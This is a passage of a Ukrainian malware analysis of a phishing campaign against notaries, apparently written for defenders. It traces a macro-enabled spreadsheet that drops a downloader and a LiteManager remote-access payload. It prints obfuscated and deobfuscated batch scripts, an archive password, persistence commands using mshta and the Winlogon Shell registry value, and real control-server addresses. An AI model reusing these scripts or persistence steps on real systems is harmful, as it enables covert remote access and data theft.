справжності - може бути скомпрометована, тому що для отримання доступу до суворо охоронюваним даним не треба ламати «фортецю», а треба всього лише скомпрометувати пристрій, з якого технологічно передбачено такий доступ.
Прийнято розрізняти кілька факторів аутентифікації на основі того, що:
- ми знаємо (пароль)
- ми маємо (токен)
- ми є (біометрія)
Разом з тим, перші два фактори аутентифицируют не людину, а пристрій - комп'ютер, телефон, за яким працює людина. І токен і пароль обробляються пристроєм, а значить, вони можуть бути відомі не тільки законному користувачеві, але і тому, хто має несанкціонований доступ до пристрою. Як би це не звучало, але така «Однофакторність» робить поняття авторства дуже непевним - можна наполягати на тому, що саме ВИ робили певну дію, або ж, навпаки, заперечувати авторство, посилаючись на недосконалість такого підходу, що було доведено на практиці.
Саме тому, ті хлопці, метою яких були державні реєстри (рис. 1), для отримання доступу до них направили вектор атаки саме на комп'ютери нотаріусів, скориставшись, до всього, ще й тим, що «є» людина (тобто, її слабкостями ).
Перш ніж приступити до опису технічної частини хотілося б відзначити, що ми вивчили ряд новинних ресурсів, на яких обговорювався цей тренд. З огляду на модель загрози, а також, беручи до уваги особливість самого процесу користування реєстрами, можна розглядати такі варіанти вирішення проблеми:
1. Побудувати окрему мережу для зв'язку робочих місць нотаріусів з реєстрами.
При такому варіанті зі спеціального робочого місця нотаріус буде мати доступ тільки до реєстрів - ні Інтернету, ні електронної пошти, ні ... «флешок» (адже потрібно перекрити всі можливі канали проникнення). Швидше за все, такий варіант навряд чи прийнятний - відразу з'являється безліч питань, як нотаріус повинен вводити/виводити із системи документи (чи зручно це?), Хто і як зможе контролювати, щоб до комп'ютера не підключалися сторонні носії, 3G-модеми, інші пристрої для доступу в інтернет.
2. Використовувати другий фактор для підтвердження дій нотаріуса.
Тут також може бути кілька варіантів - використовувати спеціальний телефон Nokia 3310, що підтримує функцію SMS, покликаних підтвердити конкретну нотаріальну дію, або використовувати мобільний додаток, за допомогою якого деталі проведеної операції будуть верифікуватися нотаріусом додатково. В обох випадках процес стає більш безпечним і автентичним, але, у другому випадку, є ризик компрометації смартфона з мобільним додатком.
Сформована ситуація свідчить про те, що необхідно задуматися над питанням забезпечення інформаційної безпеки робочого місця і/або комп'ютерної мережі нотаріуса (розглянутий вектор атаки самий пересічний). Також, не слід забувати про персональні дані, які в особливо великих розмірах, обробляються на комп'ютерах нотаріусів та/або зберігаються в використовуваних ними електронних поштових скриньках (@ mail.ru, @ yandex.ru, @ gmail.com і ін.) .
Далі ми наводимо результати короткого дослідження одного з таких інцидентів.
Отже. У кращих традиціях, знайшовши на просторах Інтернету безліч електронних адрес нотаріусів, зловмисники організовують розсилку електронних листів з підробленим адресою відправника, документом-приманкою (рис. 2) і документом з макросом у вкладенні.
Рис. 2
Після відкриття злощасного документа, перед користувачем постане вже до болю відома картина - прохання про те що б не стало, активації макросу (рис. 3), після чого, якщо користувач піддасться «макро-спокусі», документ трохи зміниться, і буде більш схожим на легітимний (рис. 4).
Рис. 3
Рис. 4
Насправді ж, вбудований в документ нехитрий макрос забезпечить створення на комп'ютері жертви JScript'а «%TMP%\script.js», вміст якого буде взято з комірки «B3» XLS-документа. Приклад макросу і приклад вмісту комірки «B3» відображені на рис. 5-6.
Рис. 5
Рис. 6
Створений в системі JScript завантажить з Інтернету шкідливий файл, який є саморозпаковуючимся CAB-архівом і, перейменувавши «193.jpg» в «run.exe», збереже його в директорії «%TMP%». В результаті макрос запустить скачаний файл на виконання. Далі ми розбираємо «матрьошку».
Скачаний CAB-архів, його можна відкрити за допомогою 7-Zip, містить два об'єкти: «poi.exe»-файл, упакований пакувальником Inno Setup (саме тому у файлу 0/0 детектів на VirusTotal) і «tero.bat» - обфусцірованний .bat файл, призначений для розпакування і запуску «poi.exe» (приклад наведено нижче).
set OErKybay=set %OErKybay% AWlBrXx= %OErKybay%%AWlBrXx%RRTkGFiE== %OErKybay%%AWlBrXx%RGPy%RRTkGFiE%a %OErKybay%%AWlBrXx%tctS%RRTkGFiE%Q %OErKybay%%AWlBrXx%jGTuX%RRTkGFiE%l […] %lnSrpN%%sWdxayhoV%%pNtG%%fOBMeVJqb%%wJsWGXqV%%AWlBrXx%%HXkKmb%%azyjm%%azyjm% %jejhHgEpv%%DgbBa%%UHeFwkt%%CMIsIp%%AWlBrXx%%ULUsrw%%UHeFwkt%%AWlBrXx%%aESwc%%AWlBrXx%%CMIsIp%%wJsWGXqV%%wJsWGXqV%%CMIsIp%%jGTuX%%JSSfFyw%%kIHRCx%%pNtG%%wJsWGXqV%%hIkbYTC%|%Gszfk%%DgbBa%%UHeFwkt%%yHxn%%AWlBrXx%%SWActtC%%LDxpA%%AWlBrXx%%IDycn%%FETNLrpj%%FETNLrpj%%sublQpeiQ%%RRTkGFiE%%IDycn%||%CMIsIp%%wJsWGXqV%%CxMis%%wJsWGXqV%%AWlBrXx%%UHeFwkt%%JSSfFyw%%OxGFrD%%CxMis%%AWlBrXx%
Якщо перетворити «tero.bat» в читаємий вигляд, ми отримаємо наступний код (код укорочений на увазі надмірності).
@Echo Off ping -n 2 google.com|Find /I "TTL="||goto next taskkill /f /im ctfmon.exe taskkill /f /im ctfmon.exe [...] poi.exe /verysilent /Password=345465122345 ping localhost -1O del %0 > nul goto 1 :next [...] del poi.exe del poi.exe del %0 > nul :1 Exit
Використовуючи отриманий вище пароль, а також утиліту innounp, отримуємо вміст файлу.
C:\>innounp.exe -v -x -p345465122345 poi.exe ; Version detected: 5500 (Unicode) #0 {app}\avicap32.dll Reading slice C:\poi.exe #1 {app}\ctfmon.exe #2 {app}\test.bat #3 {app}\test.vbs #4 install_script.iss
Якщо звернути увагу на вміст «install_script.iss», стане зрозуміло, що файли будуть вилучені в директорію «% AppData% \ MicrocoftUpdate» і першим буде виконаний скрипт «test.vbs», який, в свою чергу, запустить ще один обфусцірованний .bat файл «test.bat». На лістингу нижче показаний деобфусцірованний файл «test.bat».
tasklist | find "AvastUI.exe"
if errorlevel 1 goto NoRecord
cd "%appData%\MicrocoftUpdate\"
del sendok.txt
del poi.exe
@mshta vbscript:Execute("Set x=CreateObject(""WScript.Shell""):Set
y=x.CreateShortcut(x.SpecialFolders(""Startup"")+""\WinUpdate.lnk""):y.TargetPath=""%~dp0ctfmon.exe"":y.Save():Close()")
del %0 > nul
goto Done
:NoRecord
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d
"%appData%\MicrocoftUpdate\ctfmon.exe , explorer.exe" /f
cd "%appData%\MicrocoftUpdate\"
del sendok.txt
del poi.exe
start ctfmon.exe
del %0 > nul
:Done
Цей скрипт забезпечує персистентність файлу «ctfmon.exe». Якщо серед процесів комп'ютера виявлений процес з ім'ям «AvastUI.exe» (ймовірно, якщо запущено засіб антивірусного захисту Avast!), nо персистентність досягається за рахунок створення в директорії автозавантаження ярлика з іменем «WinUpdate.lnk» і шляхом «%AppData%\MicrocoftUpdate\ctfmon.exe ».
Якщо процес з таким ім'ям не знайдений, то персистентність буде забезпечена шляхом створення в ключі реєстру Windows «HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon» параметра «Shell», зі значенням «%appData%\MicrocoftUpdate\ctfmon.exe, explorer.exe ».
В результаті базового динамічного аналізу шкідливої програми встановлено, що на комп'ютері створюється додаткова служба, яка також забезпечує автозапуск файлу «ctfmon.exe». Для цього в реєстрі Windows створений ключ "HKLM\System\ControlSet001\Services\ROMSERVICE_SUPPORT» з параметром «ImagePath», які мають значення «%АppData%\Roaming\MicrocoftUpdate\ctfmon.exe». Програма призводить до цілого ряду модифікацій реєстру Windows, але їх все ми вказувати не будемо.
Отже, винуватець - файл «ctfmon.exe», який є потенційно не безпечною програмою для віддаленого адміністрування LiteManager версії 4.7.2.2.
Після запуску шкідлива програма ініціює взаємодію по протоколу TCP з керуючим сервером 91.240.86.200:5650. Сервер передає у відповідь адресу одного з вузлів (188.17.157.8:8080), через який буде налагоджено взаємодію між зараженим комп'ютером і зловмисником (рис. 7). Це прерогатива одного з підтримуваних LiteManager варіантів з'єднань, в даному випадку - NOIP-з'єднання (коротше кажучи - зловмисник не буде безпосередньо працювати з зараженим комп'ютером).
Рис. 7
Крім того, шкідлива програма також ініціює підключення до сервера rmansys.ru за допомогою якого зловмисникові на електронну пошту ([email protected]) приходить повідомлення про успішну установку LiteManager на атакованому комп'ютері (рис. 8).
Рис. 8
Після успішної установки програми LiteManager на комп'ютер потенційної жертви, зловмисник має можливість отримувати до нього віддалений несанкціонований доступ з усіма витікаючими з цього наслідками, так як функціонал LiteManager досить різноманітний. На рис. 9 приклад скріншота, зробленого шкідливою програмою.
Рис. 9 З метою перевірки факту зараження комп'ютера програмою LiteManager рекомендуємо скористатися поданим нижче набором індикаторів компрометації. У разі виникнення необхідності отримання консультативно-методичної допомоги, забезпечення процесу моніторингу загроз і ін., просимо звертатися за вказаними на сайті контактними даними.